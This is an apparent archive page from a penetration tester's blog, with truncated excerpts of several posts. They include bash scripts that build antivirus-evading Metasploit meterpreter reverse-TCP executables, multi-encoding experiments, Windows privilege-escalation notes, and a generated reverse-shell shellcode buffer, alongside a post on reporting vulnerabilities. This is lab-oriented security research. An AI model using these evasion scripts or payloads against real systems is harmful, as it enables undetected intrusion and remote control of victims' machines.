Posts

Showing posts from November, 2014

bash script built on technique to bypass AV v2

Image
This script has been improved and is located at this blog post.

I took the previous script that I created and spent some time adding additional padding and moving the meterpreter portion of the c code to a variable inside of the main function.

With these few modifications I was able to achieve the following results as I uploaded them to virustotal.com.

The sample at the top of the screen is using version 1 of the below script.  With the below script the detection rate decreases to 2-4 anti-viruses detecting them out of an average of 55.

The below script is what I used to generate the exe files...

#!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.27.66.1
# LPORT: 8…

bash script built on technique to bypass AV

I found the following web page in my research about metasploit encoding and bypassing the AV.

https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/

From the article I created the following bash script to automate the creation of the .exe file that can be copied to the Windows XP SP3 through a file share to test AVG 2015.  Fortunately or unfortunately this technique does bypass the AVG 2015 Free, so far 3/3 100% success rate.  Virustotal came back with 15 AVs detecting the files as malware.

This script has been improved and is located at this blog post.

 #!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.24.118.1
# LPORT…

msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations.  Then in the script copy it over to a file share on a Windows XP SP3 computer with AVG installed.  The AVG would then detect if it was a virus.

Curious how this would work and kicked out the following script. 

#!/bin/bash
#
# File that contains the encoders that are available to msfencode
listEncoders='/root/multiEncoder/msfencode.listEncoders'

# Folder where the SYS Internals Suite EXE files are located
exeFiles='/root/multiEncoder/sysInternals/exe/'

# Log file where how the payload was created and the filename of the payload
logFile='/root/multiEncoder/logFile.txt'

# Number of iterations to run the encoding through
iterationCount=5

# Bash script to create various payloads that are multi-encoded and test them again…

Notes about Windows Privilege Escalation

I need to research and understand windows privilege escalation better so this is the beginning of the journey.

Links to a couple of web pages that I have found to be great:
http://pentestmonkey.net/tools/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
http://www.fuzzysecurity.com/tutorials/18.html
http://www.slideshare.net/harmj0y/power-up-34515686

accesschk.exe from the SYS Internals Suite

Evaluating closer the Windows Privilege Escalation python script I was curious how the latest windows patches were discovered and scrubbed against metasploit.  Found that the following link takes you to an Excel spreadsheet containing all of the windows security bulletins:

http://www.microsoft.com/en-us/download/details.aspx?id=36982

From fuzzysecurity.com I extracted some of the privilege escalation KB numbers...
KiTrap0D - KB979682
MS10-021 - KB979683
MS10-059 - KB982799
MS11-011 - KB2393802
MS11-080 - KB2592799

Pulled from metasploit the local exploits that can be run:
-----…

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates a payload without the hex characters following the b in the language of python.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\…

Experiences of Reporting Vulnerabilities

I thought I would take a moment and memorialize a few experiences with reporting vulnerabilities to companies.  With the below information I am going to keep the companies anonymous.  The below vulnerabilities discussed have been mitigated by the companies in which they were reported too.  I am going too share the good, bad, and ugly ways in which companies handled these reports.

The first experience was contacting a company that publishes content and allows this content to be accessed by their respective customers.  The vulnerability existed in the security between their customers and the content that could be accessed.  With manipulating the URL with an authenticated user you could view other customers content and then it was discovered that without being authenticated you could view this information.  Upon contacting the company directly and working with them, they were appreciative that I reached out to them and I even received a courtesy call from the president of the company exp…